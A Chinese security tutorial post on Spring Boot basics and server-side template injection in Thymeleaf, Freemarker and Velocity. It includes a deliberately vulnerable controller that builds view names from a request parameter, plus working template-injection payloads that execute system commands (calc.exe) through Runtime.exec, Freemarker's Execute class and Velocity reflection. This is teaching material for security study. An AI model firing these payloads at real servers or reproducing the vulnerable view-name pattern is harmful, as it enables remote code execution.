Web开发-JavaEE应用&SpringBoot栈&模版注入&Thymeleaf&Freemarker&Velocity

SuperherRo2025-05-01 13:21

知识点:

1、安全开发-JavaEE-开发框架-SpringBoot&路由&传参

2、安全开发-JavaEE-模版引擎-Thymeleaf&Freemarker&Velocity

一、演示案例-WEB开发-JavaEE-开发框架-SpringBoot&路由&传参

类似于php语言中的thinkphp,不过要更加优秀。

参考:https://springdoc.cn/spring-boot/













1、路由映射

bash 复制代码 
@RequestMapping @GetMapping等

2、参数传递

bash 复制代码 
@RequestParam

3、数据响应

bash 复制代码 
@RestController @Controller(请求)
@RestController注解相当于@ResponseBody(响应)+@Controller(请求)合作用。










二、演示案例-WEB开发-JavaEE-模版引擎-Thymeleaf&Freemarker&Velocity

Thymeleaf

参考:https://xz.aliyun.com/news/9962

1、新建SpringBoot项目包含Web,Thymeleaf



2、配置application.properties修改缓存

3、创建模版目录和文件,文件定义修改变量



4、新建Controller目录及文件,指定路由配置









5、更换SpringBoot及Thymeleaf版本测试POC

bash 复制代码 
@Controller
public class IndexController {
    @RequestMapping("/index")
    public String index(Model model) {
//替换模版html文件中的data变量值
model.addAttribute("data", "你好 小迪");
//使用index模版文件
        return "index";
    }




bash 复制代码 
    @RequestMapping("/indexs")
    public String index(Model model,@RequestParam String lang) {
//替换模版html文件中的data变量值
model.addAttribute("data", "Hello xiaodi");
//使用index+变量lang模版文件
        return "index-"+lang;
    }
}



bash 复制代码 
利用条件:Thymeleaf漏洞版本,可控渲染模版文件
Poc:__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22calc.exe%22).getInputStream()).next()%7d__::.x





Freemarker

参考:https://mp.weixin.qq.com/s/TtNxfSYsB4HMEpW_OBniew

1、新建SpringBoot项目包含Web,Freemarker



2、配置application.properties修改缓存

3、创建模版目录和文件,文件定义修改变量


4、新建Controller目录及文件,指定路由配置






5、更换SpringBoot及Freemarker版本测试POC

bash 复制代码 
 <#assign value="freemarker.template.utility.Execute"?new()>${value("calc.exe")}





bash 复制代码 
<#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","calc.exe").start()}

<#assign value="freemarker.template.utility.JythonRuntime"?new()>${value("calc.exe")}<@value>import os;os.system("calc.exe")</@value>//@value为自定义标签

利用条件:可控渲染的模版文件

Velocity


参考:https://blog.csdn.net/2401_83799022/article/details/141600988

bash 复制代码 
<dependency>
    <groupId>org.apache.velocity</groupId>
    <artifactId>velocity</artifactId>
    <version>1.7</version>
</dependency>



bash 复制代码 
Poc:%23set($e%3D"e")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("calc")
bash 复制代码 
利用条件:Velocity漏洞版本,可控模版变量或文件


相关推荐
双力臂4045 小时前
Spring Boot 单元测试进阶:JUnit5 + Mock测试与切片测试实战及覆盖率报告生成
java·spring boot·后端·单元测试
itLaity6 小时前
基于Kafka实现简单的延时队列
spring boot·分布式·kafka
midsummer_woo6 小时前
基于spring boot的医院挂号就诊系统(源码+论文)
java·spring boot·后端
fouryears_2341712 小时前
什么是JSON,如何与Java对象转化
java·spring boot·spring·json
wuk99813 小时前
互联网应用主流框架整合 Spring Boot开发
java·spring boot·后端
风象南13 小时前
SpringBoot实现Serverless:手撸一个本地函数计算引擎
spring boot·serverless
Code季风16 小时前
Spring AOP 与事务管理进阶:传播行为原理与实战指南
java·spring boot·spring
武昌库里写JAVA16 小时前
vue+iview+i18n国际化
java·开发语言·spring boot·学习·课程设计
你我约定有三16 小时前
RabbitMQ--Springboot解决消息丢失
java·spring boot·rabbitmq·java-rabbitmq
tang_jian_dong18 小时前
springboot + vue3 拉取海康视频点位及播放
spring boot·后端·音视频
热门推荐
01Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code02全球最强模型Grok4,国内已可免费使用!(附教程)03vue数据变化但页面不变04KGG转MP3工具|非KGM文件|解密音频05sqli-labs 靶场 less-8、9、10 第八关到第十关详解:布尔注入,时间注入06扣子开源本地部署教程 丨Coze智能体小白喂饭级指南07干翻 Typora!MilkUp:完全免费的桌面端 Markdown 编辑器!08【2025.7.18】更新vscode后所有.vue文件template标签后报红的临时解决办法,Vue - Official 插件3.0.2导致09ChatGPT Agent 完全使用指南:2025年7月最新功能详解10《魔兽世界》提示lua警告的含义及解决方法